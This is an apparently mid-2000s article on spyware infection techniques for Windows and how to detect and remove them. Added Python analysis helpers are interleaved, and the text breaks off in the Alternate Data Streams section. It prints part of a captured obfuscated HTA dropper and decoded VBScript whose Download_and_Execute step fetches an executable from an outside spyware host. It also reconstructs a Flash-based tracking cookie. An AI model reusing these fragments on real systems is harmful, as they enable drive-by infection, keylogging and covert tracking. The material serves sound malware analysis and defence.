Spyware infection methods

Christiaan Beek

The primary purpose of spyware is to collect demographic and usage information, but sometimes also private data. Such programs are usually bundled as a hidden component of other software or downloaded from the Internet unwittingly. They install and run without the user's knowledge. What's worse, most antivirus packages ignore them. Let's see what methods such programs use to infect Windows systems and how one can protect oneself against them.

Recent research results from well-known organisations such as CSI/FBI show that almost 80 percent of computer systems are infected by spyware. The amount of spyware is still growing, because spyware authors keep adopting new technical skills. As it is a very lucrative business, organised crime invests in people and technology. For organisations, this threat is difficult to protect against: on the one hand, they have to implement a solution that prevents infection, but on the other, this solution must also be capable of cleaning already infected computer systems.

Let's have a closer look at the techniques that spyware currently uses to infect Windows systems. With each technique described, we'll also mention solutions to detect and avoid infection and to remove the threat. This article should not be treated as a complete compendium on spyware, but rather as a look at a few interesting techniques that spyware authors developed for their own purposes, and at manual methods of protection against those techniques, as automated tools are not always able to help users in this respect.

Spyware species

Pop-ups

Pop-ups are used to trick the user into clicking on them. They can be contained in websites or e-mail, attached to other software, or take the form of toolbars installed as plug-ins for Internet Explorer. Lots of peer-to-peer software contains such components. For example, KaZaA includes GAIN (Gator) and Cydoor. GAIN monitors surfing habits and downloads advertisements from the Internet, presenting them in KaZaA. Cydoor downloads a big list of URLs during KaZaA installation and shows these URLs later, when you're browsing the Internet.

Another type of pop-up spyware uses the Messenger service in Windows and shows text advertisements (see Figure 1). Windows NT/XP/200x users can easily avoid this by disabling the Messenger service.

Dialers

Dialers usually secretly change the dial-up connection settings, so that instead of calling a local Internet provider, the user's call is routed to a very expensive international connection. They are most often used as a payment method for accessing websites with game and adult content. When installing dialers, user consent is usually required (see Figure 2).

Browser hijackers

Browser hijackers change the browser settings without user permission. Usually the home page and search page locations are affected, but often bookmarks are added as well. An example of a nasty collection of browser hijackers is ISTbar. It installs the Tinybar toolbar, but can also install other parasites, some of them showing porn pop-ups.

Spying cookies

Cookies, most often legitimately used to enable user identification when returning to a website, can also be exploited as spyware. Some websites use cookies to track surfing habits. These are most often third party cookies - cookies sent not by the website one is viewing (often via advertising banners). Luckily, cookies are not dangerous - they cannot be used to spread other code.

A company like DoubleClick runs banners from its own servers and uses these servers to set and read cookies. This way, DoubleClick is able to detect which customers are visiting which websites where its banners are served.

Figure 1. A typical Messenger pop-up ad

Figure 2. Users often install dialers by their own consent

Object Data Tags

Object Data Tags are tags that specify the data and parameters for objects inserted into HTML documents, and the code that can be used to display or manipulate that data. A remote attacker could create a crafted URL link using Object Data Tags that is executed in the victim's web browser within the security context of the hosting site, once the link is clicked. The attacker exploits this vulnerability by creating a malicious webpage, compromising an existing webpage, or sending the page to a victim as an HTML e-mail.

A practical example

Let's have a look at Listing 1, which contains part of a data stream captured via an IDS alert. This highly obfuscated code in reality uses JavaScript to create a file called q706634.exe on the C:\ partition of the system. The filename looks deceptively similar to that of a Microsoft update file.

Listing 1. Data captured via an IDS alert

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 12:27:30 GMT
Server: Apache/1.3.33 (Unix) mod_deflate/1.0.21
Connection: close
Transfer-Encoding: chunked
Content-Type: application/hta

<script language=jscript>try{
self.moveTo(5000,5000);function b2u(c){var x="";
for(w=0;w<c.length;){h=Array();for(e=0;e<8;e++){h[e]=
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
.indexOf(c.charAt(w++));}x+=String.fromCharCode(h[0]<<10|h[1]
<<4|h[2]/4,h[2]<<14|h[3]<<8|h[4]*4|h[5]>>4,h[5]<<12|h[6]<<6|h[7]);}return
x;}g=new ActiveXObject("Scripting.FileSystemObject");fname=
'c:\q706634.exe';t=g.CreateTextFile(fname,true);t.Write('MZ');
t.Close();t=g.OpenTextFile((fname),8,false,true);t.Write(b2u(
"hkjhfksjdyuiuywejkrwje!`?{}{jiihfsdfhhdhfd[]]
[kjsdjkajsjkjsd)(qyqm,mniuajkalkdfhksdkjfds78e9893jka89j23o0jl&
*&kjkjskjdkdf&*jdjfsf98slkdkjq9jaoiu
(...)

A quick look at the functional portion reveals that data is decoded and written into this file. The executable is then run. An ActiveX component is also used in this code; it opens the file on the target machine. A slight alteration of the original script function allows us to write out the decoded content and discover what it does. Listing 2 contains snippets of the output.

Listing 2. Snippets of output from a modified version of the spyware link

<textarea id="Main_HTA">
<HTA:APPLICATION id=DSD
Applicationname="DSD"
showintaskbar=NO
caption=YES
<IFRAME name="icounter" src="about:blank" widh=8 height=8></IFRAME>
<SCRIPT language="VBSCRIPT">
If Instr(Exploit_Path,"cgi-bin")<>0 then CGI_SCRIPT_PATH=Exploit_PATH & "spycheck.cgi"
WinOS=Get_Win_Version
Select Case WinOS
Case "NT"
Call Download_and_Execute (Trojan_Path,Exename, " ",1)
Trojan_Path="http://www.isendyousomenicespyware.com/spikey.exe"

The file q706634.exe is a Win32 executable, 32,367 bytes long. After analysing it with OllyDbg, we can find out more about what the file does. When spikey.exe is downloaded and executed, it is copied to the WINDOWS\System32 folder under the name hddwizz.exe and installs a key to launch itself in HKLM\Software\Microsoft\Windows\Currentversion\Run. DLLs are also installed in the same folder. Together, these components work as a keylogger that sends the captured data by e-mail and then deletes it.

Several spyware/trojans of this type were captured by the author via honeypots. They used the same obfuscation and decoding tricks, working with IFRAMEs and redirection techniques.
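The "slight alteration" of the script that writes out the decoded content can be done without ever running the dropper. The following Python port of the b2u() routine from Listing 1 is an added example, not code from the article or from the captured sample: it reproduces the decoder bit for bit (the JScript `h[2]/4` and `h[4]*4` become shifts, since `|` truncates to an integer in JScript, and `fromCharCode` keeps the low 16 bits), adds the inverse so a test payload can be constructed offline, and pulls every b2u("...") argument out of a script with a regular expression. The encoder, the `decode_payloads` helper and the sample script are assumptions for illustration; the real payload from the capture is not included.

```python
import re

# Alphabet used by the captured b2u() routine: the standard base64 symbols,
# but decoded into 16-bit characters, three characters per eight symbols.
B2U_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def b2u_decode(encoded: str) -> str:
    """Port of the captured b2u(): every 8 symbols yield 3 UTF-16 code units."""
    if len(encoded) % 8:
        raise ValueError("b2u input length must be a multiple of 8 symbols")
    out = []
    for i in range(0, len(encoded), 8):
        h = [B2U_ALPHABET.index(ch) for ch in encoded[i:i + 8]]  # ValueError on junk
        c1 = (h[0] << 10) | (h[1] << 4) | (h[2] >> 2)                          # h[2]/4
        c2 = ((h[2] << 14) | (h[3] << 8) | (h[4] << 2) | (h[5] >> 4)) & 0xFFFF  # h[4]*4
        c3 = ((h[5] << 12) | (h[6] << 6) | h[7]) & 0xFFFF
        out.append(chr(c1) + chr(c2) + chr(c3))
    return "".join(out)


def b2u_encode(text: str) -> str:
    """Inverse of b2u_decode (assumed, for building test input); NUL-pads to 3 chars."""
    text += "\x00" * (-len(text) % 3)
    out = []
    for i in range(0, len(text), 3):
        v = (ord(text[i]) << 32) | (ord(text[i + 1]) << 16) | ord(text[i + 2])
        out.append("".join(B2U_ALPHABET[(v >> (42 - 6 * k)) & 63] for k in range(8)))
    return "".join(out)


PAYLOAD_RE = re.compile(r'b2u\(\s*"([A-Za-z0-9+/]+)"\s*\)')


def decode_payloads(script: str) -> list:
    """Extract every b2u("...") argument from a script and return the decoded text."""
    return [b2u_decode(m).rstrip("\x00") for m in PAYLOAD_RE.findall(script)]


# Constructed sample: the dropper pattern of Listing 1 carrying a harmless payload.
SAMPLE_SCRIPT = (
    "t.Write('MZ');t.Close();"
    "t=g.OpenTextFile((fname),8,false,true);"
    't.Write(b2u("' + b2u_encode("constructed sample payload, not the real dropper") + '"));'
)

if __name__ == "__main__":
    for payload in decode_payloads(SAMPLE_SCRIPT):
        print(repr(payload))
```

Decoded output should be treated as binary: the dropper writes an MZ header first, so what b2u() yields is the body of a Win32 executable, to be saved with a harmless extension and inspected in a disassembler as the article does with OllyDbg.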

How to detect/avoid/remove

In order to avoid such infection, the following methods should be used:

  • Regular updates of Windows - installation of patches.

  • ACLs (Access Control Lists) on the C:\WINDOWS and C:\WINDOWS\system32 directories to prevent users from installing software in these locations.

  • ACLs on the following registry keys to prevent users from adding values (Set Value or Create Subkey):

      • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run,
      • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce,
      • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices,
      • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services.

  • Using file integrity software like Tripwire.

If infected, most anti-spyware and antivirus software is able to detect and clean up the mess. However, it is recommended to perform multiple runs with different types of anti-spyware. Hitman Pro (see Inset On the Net) is especially recommended in such a case.

Persistent Identification Elements

A company called United Virtualities developed this new technique. According to their website, a Persistent Identification Element (PIE) is tagged to the user's browser, providing each with a unique ID just like traditional cookie coding. However, PIEs cannot be deleted by any commercially available anti-spyware, malware, or adware removal program. They will even function at the default security setting for Internet Explorer.

United Virtualities have created two types of PIE:

  • AccuCounter PIE, a cookie replacement that counts unique users accurately,

  • Backup PIE, a PIE that not only counts unique users but also recognizes the visitor and restores any erased cookies.

How does it work

Most browsers, like Firefox and Internet Explorer, use a zone model to handle cookies. End-users can allow, deny or delete cookies. To circumvent these restrictions, Local Shared Objects (LSOs) are used. Local Shared Objects were developed by Macromedia for use with their Flash player. These little files are installed on the system by JavaScript or the Flash plug-in. This type of file has the extension .sol and can be located in a variety of places, usually a sub-directory of \Documents and Settings\{User Name}\Application Data\Macromedia\Flash Player\. After installation they operate like normal cookies.

United Virtualities uses these Local Shared Objects and gives them a unique identification number. By this number, an end-user is easily followed around the Internet. Using this technique, when a website discovers a cookie missing, it can look for a backup in Flash and restore the cookie.

A practical example

Since United Virtualities does not provide the code, we can try to reconstruct some of it based on the concepts used. Macromedia provides good documentation about writing Local Shared Objects. Using this documentation we can construct code such as seen on Listing 3.

Listing 3. An example of a Local Shared Object

// Create an SO
mySO = SharedObject.getLocal("sticky spyware");
// Add some important data
mySO.data.stickAround = "uniqueID=w@nnaspy0nyoursurfing234589712";
// Write the SO to the disk
mySO.flush();
// Drop the reference
delete mySO;
// Reload the SO by the same name, which reads the .sol file back from disk
mySO = SharedObject.getLocal("sticky spyware");
// Scan the SO for values
for (a in mySO.data) {
    trace(a+": "+mySO.data[a]);
}

As we can see, LSOs are very easy to create. By combining them with JavaScript on a web page, they can easily be injected into a user's browser.

How to detect/avoid/remove

Avoiding PIEs is as easy as changing the global Flash settings. For reference on how to use the Settings Manager, it's best to visit the page http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager.html. From this page we can go directly to changing the settings.

Figure 3. Changing Flash settings to avoid PIEs

There are a number of pages where settings on our local computer can be adjusted. First, select Global Security Settings Panel from the left. To prevent any website accessing or storing information on our computer, we must click the Always deny button. It's also a good idea to do the same in the Global Privacy Settings panel.

In order to detect LSOs, we can simply search for files with the .sol extension (see Figure 4). From the results, it is clear that some of the entries found come from Web advertisements. However, it can also be seen that many of these cookies have a legitimate purpose. Other members of the Flash MX suite may also use Local Shared Objects.

Figure 4. Files with the .sol extension containing Local Shared Objects

We can therefore see that persistent files are by no means only due to advertising, but may be present for a variety of legitimate reasons. While it might be tempting to stop tracking by the brute-force method of deleting all .sol files, there is a better way. Visit the webpage http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager07.html. The Flash application on this page shows which websites are using LSOs (see Figure 5). Now we can easily remove the elements by deleting the website in the Settings Manager.

Figure 5. A list of websites which stored LSOs on a local machine
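Searching for .sol files tells us which sites stored an LSO, but not what they stored. The following Python parser is an added example (not the article's code and not United Virtualities' or Macromedia's): it reads the AMF0-encoded .sol layout as commonly documented by the community (00 BF, a big-endian length, "TCSO", six fixed bytes, the object name, a version word, then length-prefixed key/value entries each closed by a 0x00 byte; this layout is an assumption of the example), returns the stored values, and flags string values that carry a long opaque token, the shape of the PIE-style unique ID from Listing 3. A small builder constructs the sample file so the example runs offline; the sample is constructed, not captured from a real site.

```python
import re
import struct

SOL_MAGIC = b"\x00\xbf"
SOL_SIGNATURE = b"TCSO\x00\x04\x00\x00\x00\x00"   # assumed fixed header bytes


def _u16str(s: str) -> bytes:
    """AMF0 short string: 2-byte big-endian length followed by UTF-8 bytes."""
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def build_sol(name: str, data: dict) -> bytes:
    """Construct an AMF0 .sol blob; used here only to create an offline sample."""
    body = SOL_SIGNATURE + _u16str(name) + b"\x00\x00\x00\x00"   # version 0 = AMF0
    for key, value in data.items():
        body += _u16str(key)
        if isinstance(value, bool):            # bool first: bool is an int subclass
            body += b"\x01" + (b"\x01" if value else b"\x00")
        elif isinstance(value, (int, float)):  # AMF0 number: IEEE-754 double
            body += b"\x00" + struct.pack(">d", float(value))
        elif isinstance(value, str):
            body += b"\x02" + _u16str(value)
        elif value is None:
            body += b"\x05"
        else:
            raise TypeError(f"unsupported value type for {key!r}")
        body += b"\x00"                        # entry terminator
    return SOL_MAGIC + struct.pack(">I", len(body)) + body


def parse_sol(blob: bytes):
    """Return (object name, {key: value}) for an AMF0 .sol file, rejecting malformed input."""
    if blob[:2] != SOL_MAGIC or blob[6:16] != SOL_SIGNATURE:
        raise ValueError("not a .sol file")
    if struct.unpack(">I", blob[2:6])[0] != len(blob) - 6:
        raise ValueError("length field does not match file size")
    pos = 16
    (name_len,) = struct.unpack(">H", blob[pos:pos + 2]); pos += 2
    name = blob[pos:pos + name_len].decode("utf-8"); pos += name_len
    (version,) = struct.unpack(">I", blob[pos:pos + 4]); pos += 4
    if version != 0:
        raise ValueError(f"AMF version {version} not handled (only AMF0)")
    data = {}
    while pos < len(blob):
        (key_len,) = struct.unpack(">H", blob[pos:pos + 2]); pos += 2
        key = blob[pos:pos + key_len].decode("utf-8"); pos += key_len
        marker = blob[pos]; pos += 1
        if marker == 0x00:                                    # number
            (value,) = struct.unpack(">d", blob[pos:pos + 8]); pos += 8
        elif marker == 0x01:                                  # boolean
            value = blob[pos] != 0; pos += 1
        elif marker == 0x02:                                  # string
            (slen,) = struct.unpack(">H", blob[pos:pos + 2]); pos += 2
            value = blob[pos:pos + slen].decode("utf-8"); pos += slen
        elif marker in (0x05, 0x06):                          # null / undefined
            value = None
        else:
            raise ValueError(f"AMF0 type 0x{marker:02x} not handled at offset {pos - 1}")
        if blob[pos] != 0:
            raise ValueError("missing entry terminator")
        pos += 1
        data[key] = value
    return name, data


ID_TOKEN = re.compile(r"[A-Za-z0-9]{16,}")


def suspicious_ids(data: dict) -> list:
    """Flag string values carrying a long opaque token, the shape of a PIE-style user ID."""
    return [(k, v) for k, v in data.items() if isinstance(v, str) and ID_TOKEN.search(v)]


# Constructed sample mirroring Listing 3 (not a file captured from a real site).
SAMPLE_SOL = build_sol("sticky spyware", {
    "stickAround": "uniqueID=w@nnaspy0nyoursurfing234589712",
    "visits": 3,
    "optedOut": False,
})

if __name__ == "__main__":
    name, data = parse_sol(SAMPLE_SOL)
    print(name, data, suspicious_ids(data))
```

Run over every .sol file under the Flash Player directory named above, the parser separates legitimate state (counters, preferences) from tracking identifiers, which is exactly the distinction Figure 4 leaves to guesswork. Objects written with AMF3 (version word 3) are rejected rather than mis-parsed.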

 

Browser Helper Objects

With Browser Helper Objects we can write components (specifically, in-process Component Object Model (COM) components) that Internet Explorer will load each time it starts up. Such objects run in the same memory context as the browser and can perform any action on the available windows and modules. A BHO could access the browser's menu and toolbar and make changes, create windows to display additional information on the currently viewed page, and install hooks to monitor messages and actions. An example of some legal applications using the BHO are toolbars from Google and Yahoo.

How does it work

A BHO is tied to the browser's main window. In practice, this means a new instance of the object is created as soon as a new browser window is created. Any instance of the BHO lives and dies with the browser's instance. BHOs only exist in Internet Explorer, version 4.0 and later.

Figure 6. How BHOs work

In its simplest form, a BHO is a COM in-process server registered under a certain registry key. Upon startup, Internet Explorer looks up that key and loads all the objects whose CLSIDs are stored there. The browser initializes each object and asks it for a certain interface. If that interface is found, Internet Explorer uses the methods it provides to pass its IUnknown pointer down to the helper object. Because BHOs have unrestricted access to the Internet Explorer event model, some forms of malware have also been created as BHOs.

A practical example

Since writing BHOs involves quite a bit of code, we recommend looking at an example of a legitimate project built with these techniques: http://www.codeproject.com/atl/popupblocker.asp. Manuals for writing BHOs can be found on the Microsoft MSDN website.

How to detect/avoid/remove

Programs such as BHODemon (see Figure 7 and Inset On the Net) can prevent BHOs from launching when Internet Explorer starts. BHODemon can also be used to detect infection and identify the main plug-in file associated with the BHO (typically a .DLL or .OCX file located in the Windows System folder), so that the file can be removed manually.

Figure 7. BHODemon - software for managing BHOs
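Both the autorun keys listed in the ACL recommendations earlier and the BHO registration key can be audited from a plain registry export, which is convenient when the suspect machine is examined offline or over a remote shell. The following Python script is an added example, not the article's code and not BHODemon's: it parses the text format that `reg export` writes, lists every value under the Run, RunOnce and RunServices keys, and resolves each registered BHO CLSID to its in-process DLL through HKEY_CLASSES_ROOT\CLSID. The BHO key path is the standard Windows location and is not named in the article; the sample export is constructed, with hddwizz.exe taken from the analysis above and a placeholder CLSID that belongs to no real component.

```python
import re

# Keys from the ACL recommendations above, plus the standard registration point
# for Browser Helper Objects (a well-known Windows key, not named in the article).
AUTORUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices",
)
BHO_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"
CLSID_ROOT = r"HKEY_CLASSES_ROOT\CLSID"

# "name"=data or @=data (default value); the name may contain escaped quotes.
VALUE_LINE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def parse_reg(text: str) -> dict:
    """Parse a .reg export into {key path: {value name: data}}.

    REG_SZ and dword values are decoded; other types are kept as their raw text.
    The default value of a key is stored under the empty name "".
    """
    reg, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            reg.setdefault(current, {})
            continue
        m = VALUE_LINE.match(line)
        if m is None or current is None:
            continue  # continuation lines of hex: values are not needed here
        name = m.group(1) if m.group(1) is not None else ""
        data = m.group(2)
        if len(data) >= 2 and data[0] == data[-1] == '"':
            value = re.sub(r"\\(.)", r"\1", data[1:-1])  # undo \\ and \" escaping
        elif data.startswith("dword:"):
            value = int(data[6:], 16)
        else:
            value = data
        reg[current][name] = value
    return reg


def autorun_entries(reg: dict) -> list:
    """(key, value name, command) for every value under the Run-type keys (case-insensitive)."""
    wanted = {k.lower() for k in AUTORUN_KEYS}
    return [(key, name, cmd) for key, values in reg.items()
            if key.lower() in wanted for name, cmd in values.items()]


def bho_entries(reg: dict) -> list:
    """(CLSID, in-process DLL) for every registered BHO, resolved through HKCR\\CLSID."""
    lower = {k.lower(): v for k, v in reg.items()}
    prefix = BHO_KEY.lower() + "\\"
    found = {}
    for key in reg:
        if key.lower().startswith(prefix):
            clsid = key[len(prefix):].split("\\")[0]
            server = lower.get(f"{CLSID_ROOT}\\{clsid}\\InProcServer32".lower(), {})
            found[clsid] = server.get("")    # None when the CLSID has no server entry
    return sorted(found.items())


# Constructed sample export: the Run value from the spikey.exe analysis above and
# one BHO with a placeholder CLSID (not a real component).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"hddwizz"="C:\\WINDOWS\\System32\\hddwizz.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00000000-0000-0000-0000-000000000001}]

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\InProcServer32]
@="C:\\WINDOWS\\System32\\example-bho.dll"
"ThreadingModel"="Apartment"
"""

if __name__ == "__main__":
    reg = parse_reg(SAMPLE_REG)
    for entry in autorun_entries(reg) + bho_entries(reg):
        print(entry)
```

Comparing two exports taken before and after a suspected infection (or against a Tripwire-style baseline) turns the listing into a diff of exactly the keys the ACL advice protects.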

 

WinSock hijackers

To chain a program into the WinSock2 implementation, LSPs are used. LSP stands for Layered Service Provider. Since LSPs form a chain through which WinSock is used, all data is also transported through each LSP in the chain.

Figure 8. LSPs in the WinSock chain

 

Spyware using the technique called WinSock hijacking reroutes network traffic to, for example, sites with adult content. An example of such a program is WebHancer (though WebCancer would be a much better name).

A practical example

When analysing such software using the Malcode Analyst Pack from iDEFENSE Labs (see Inset On the Net), the strings command reveals the strings presented in Listings 4 and 5. These examples show how the proxy uses the WebHancer website, adding and modifying registry keys to reroute the browser traffic.

Listing 4. Analysis of a Winsock hijacker

Start Page
Software\Microsoft\Internet Explorer\Main
srchost_table_size
plugins
data_timeout
time_offset
data.webhancer.com:80
dc_servers
secondary.webhancer.com:80
sec_auth_server
prime.webhancer.com:80
prim_auth_server
HTTP/1.0
 

Listing 5. More code found using the Malcode Analyst Pack

46F021DC-CB81-4acc-BA1B-9E1B440020D4er
127.0.0.1
localhost
912B4D64-E5A5-4bfc-9808-4CF149F2F965-31
951B13F8-F40D-4c56-BD57-909A968F918B-31
4851F512-58B1-446a-85A0-D944078E9A7D-31
B317949A-EE2E-48e6-BE41-CD5744F706D2-31
6A803934-0F46-489a-B02A-8A6DDFE30BB0-31
74F5FD53-368F-4e0d-805B-4A983826EF91-31
default
%s:%d
RegWhWs2Lsp
Programs\webhdll.dll
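The strings run in Listings 4 and 5 is the first step of static triage; the useful second step is sorting what comes out into the few indicator classes that matter for an LSP sample. The following Python snippet is an added example, not code from the article or from the Malcode Analyst Pack: it implements the printable-run extraction that strings(1) performs and classifies the results as host:port contact points, registry paths, GUIDs (the shape of the catalog entries in Listing 5) and DLL names, plus a hint for Winsock catalog API names. The binary is a constructed stand-in built from the listings' own strings, and the `WSCInstallProvider`/`WSCEnumProtocols` names in the last pattern are real Winsock 2 catalog APIs that do not appear in the listings.

```python
import re

# Constructed stand-in for a stripped binary: the strings from Listings 4 and 5
# separated by non-printable bytes, as strings(1) would meet them in a real sample.
SAMPLE_BINARY = b"MZ\x90\x00\x03\x00" + b"\x00\x8b\xff".join([
    b"Start Page",
    b"Software\\Microsoft\\Internet Explorer\\Main",
    b"data.webhancer.com:80",
    b"prime.webhancer.com:80",
    b"127.0.0.1",
    b"RegWhWs2Lsp",
    b"Programs\\webhdll.dll",
    b"46F021DC-CB81-4acc-BA1B-9E1B440020D4",
]) + b"\x90\x90\xc3"


def strings(blob: bytes, min_len: int = 4) -> list:
    """Runs of at least min_len printable ASCII bytes, the output strings(1) gives."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


# Indicator classes worth pulling out of an LSP/proxy sample: contact points,
# the registry paths it touches, catalog GUIDs, the DLL it drops, catalog APIs.
INDICATORS = {
    "hostport": re.compile(r"^[a-z0-9.-]+\.[a-z]{2,}:\d+$", re.I),
    "registry": re.compile(r"^Software\\", re.I),
    "guid": re.compile(r"^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}", re.I),
    "dll": re.compile(r"\.dll$", re.I),
    "lsp": re.compile(r"Lsp|WSCInstallProvider|WSCEnumProtocols"),
}


def triage(blob: bytes) -> dict:
    """Group the extracted strings by indicator class; unmatched strings are left out."""
    found = {name: [] for name in INDICATORS}
    for s in strings(blob):
        for name, rx in INDICATORS.items():
            if rx.search(s):
                found[name].append(s)
    return found


if __name__ == "__main__":
    for cls, hits in triage(SAMPLE_BINARY).items():
        print(f"{cls:9s} {hits}")
```

The host:port hits are what to block at the perimeter and look for in proxy logs; the DLL name and registry path are what LSP-Fix and Hijack This will show on an infected host.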

 

How to detect/avoid/remove

Trying to remove programs of this kind is very difficult. Before we know it, we might break our Internet connection for good, because we've removed the wrong DLLs. Therefore, it is best to use a dedicated program for this purpose. A good example is LSP-Fix (see Inset On the Net). To avoid installation of a WinSock hijacker, we can also use a tool called SockLock (see Inset On the Net). This tool prevents modification of WinSock by locking it.

To detect WinSock hijackers, we can use a tool called Hijack This (see Inset On the Net). Upon running this tool, we will be informed if our WinSock has been hijacked (e.g. Hijacked Internet access by New.NetI) or broken (e.g. Broken Internet access because of LSP provider 'c:\progra~1\common~2\toolbar\cnmib.dll' missing). Hijack This is, however, incapable of fixing the problem. We still have to use LSP-Fix.

Man-in-the-Middle proxies

Increase your Internet speed by up to 40 percent - wouldn't that be nice? Many users fall for such advertisements and download programs such as MarketScore (the filename is ossproxy). It is recommended never to download and install such programs, since there is a big chance, that in reality the program will route all Internet traffic on our system through dedicated proxy servers (including secure transactions!).

How does it work

The software usually installs a trusted certificate authority. By using the man-in-the-middle method, all traffic is first sent to the man-in-the-middle servers and then towards the destination entered in the URL field of the browser. The owners of these servers easily harvest all data, including passwords and other confidential information.

Figure 9. How man-in-the-middle proxies work

 

How to detect/avoid/remove

Since most such software is installed willingly by the user, the method to avoid it is simple - don't install.

To detect whether such software is installed, we need a tool that shows us the characteristics of our connections. A good tool for this purpose is Active Ports. Figure 10 shows its use for detecting a MarketScore infection. We can clearly see many sessions using the ossproxy.exe file while surfing the Internet.

Figure 10. Detecting MarketScore using Active Ports
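The picture Active Ports gives in Figure 10 can be reproduced from two built-in commands, which matters when a suspect host has no third-party tools on it. The following Python script is an added example, not the article's code and not Active Ports: it joins the output of `netstat -ano` and `tasklist /fo csv` (both real Windows commands whose formats are reproduced here), counts established TCP sessions per process image, and flags the relay shape that a local man-in-the-middle proxy produces, a non-browser image that both holds web sessions to the Internet and has a loopback session whose peer is the browser. The sample output is constructed; the loopback relay port 8080 is an assumption of the example, not a documented MarketScore value.

```python
import csv
import io
import re
from collections import Counter

# Constructed sample output of `netstat -ano` and `tasklist /fo csv` on a host where a
# relay process (ossproxy.exe) sits between the browser and the web. Port 8080 for the
# local relay listener is an assumption, not a documented MarketScore value.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.10:1045      203.0.113.8:80         ESTABLISHED     1240
  TCP    192.168.1.10:1046      203.0.113.8:80         ESTABLISHED     1240
  TCP    192.168.1.10:1047      203.0.113.8:443        ESTABLISHED     1240
  TCP    127.0.0.1:8080         127.0.0.1:1049         ESTABLISHED     1240
  TCP    127.0.0.1:1049         127.0.0.1:8080         ESTABLISHED     1912
  TCP    192.168.1.10:1050      198.51.100.20:443      TIME_WAIT       0
  UDP    0.0.0.0:500            *:*                                    700
"""
SAMPLE_TASKLIST = '''"Image Name","PID","Session Name","Session#","Mem Usage"
"System Idle Process","0","Console","0","16 K"
"svchost.exe","700","Console","0","4,120 K"
"ossproxy.exe","1240","Console","0","6,532 K"
"iexplore.exe","1912","Console","0","22,908 K"
'''

# proto, local, foreign, optional state (absent for UDP), pid
NETSTAT_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")


def parse_netstat(text: str) -> list:
    """Rows of `netstat -ano` as dicts; UDP rows carry an empty state."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_ROW.match(line)
        if m:
            proto, local, foreign, state, pid = m.groups()
            rows.append({"proto": proto, "local": local, "foreign": foreign,
                         "state": state or "", "pid": int(pid)})
    return rows


def parse_tasklist(csv_text: str) -> dict:
    """PID -> image name from `tasklist /fo csv`."""
    return {int(r["PID"]): r["Image Name"] for r in csv.DictReader(io.StringIO(csv_text))}


def established_by_image(netstat_text: str, tasklist_text: str) -> Counter:
    """ESTABLISHED TCP sessions per process image: the per-process view Active Ports gives."""
    images = parse_tasklist(tasklist_text)
    counts = Counter()
    for r in parse_netstat(netstat_text):
        if r["proto"] == "TCP" and r["state"] == "ESTABLISHED":
            counts[images.get(r["pid"], f"pid {r['pid']}")] += 1
    return counts


def relay_suspects(netstat_text: str, tasklist_text: str,
                   browsers=("iexplore.exe", "firefox.exe")) -> list:
    """Non-browser images holding web sessions (80/443) to the Internet AND a loopback
    session whose peer is a browser: the connection shape of a local MITM relay."""
    images = parse_tasklist(tasklist_text)
    rows = [r for r in parse_netstat(netstat_text)
            if r["proto"] == "TCP" and r["state"] == "ESTABLISHED"]
    browser_pids = {pid for pid, img in images.items() if img.lower() in browsers}
    by_local = {r["local"]: r["pid"] for r in rows}   # who owns each local endpoint
    web, relaying = set(), set()
    for r in rows:
        if r["pid"] in browser_pids:
            continue
        host, port = r["foreign"].rsplit(":", 1)
        if host.startswith("127.") and by_local.get(r["foreign"]) in browser_pids:
            relaying.add(r["pid"])
        elif port in ("80", "443") and not host.startswith("127."):
            web.add(r["pid"])
    return sorted(images.get(pid, f"pid {pid}") for pid in web & relaying)


if __name__ == "__main__":
    print(established_by_image(SAMPLE_NETSTAT, SAMPLE_TASKLIST))
    print(relay_suspects(SAMPLE_NETSTAT, SAMPLE_TASKLIST))
```

A browser that only ever talks to 127.0.0.1 while another image carries all the port 80 and 443 sessions is the tell; confirming it means checking that image's path and the certificate store for the CA the proxy installed.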

 

Alternate Data Streams

NTFS is the filesystem of choice when installing a Microsoft platform. It offers stability and security plus many interesting mechanisms. One such mechanism, Alternate Data Streams (ADS), is used to provide compatibility with the Macintosh Hierarchical File System, to store summary data of a selected file, or to track volume changes. Microsoft doesn't provide tools to detect the presence of code hidden within ADS streams.

Alternate Data Streams are only slightly different from primary data streams, yet they are handled very differently both by Microsoft and by third-party applications on Windows. The biggest difference between primary and alternate data streams is whether an application is capable of detecting an alternate stream at all and, if it is, how the streams are accessed.

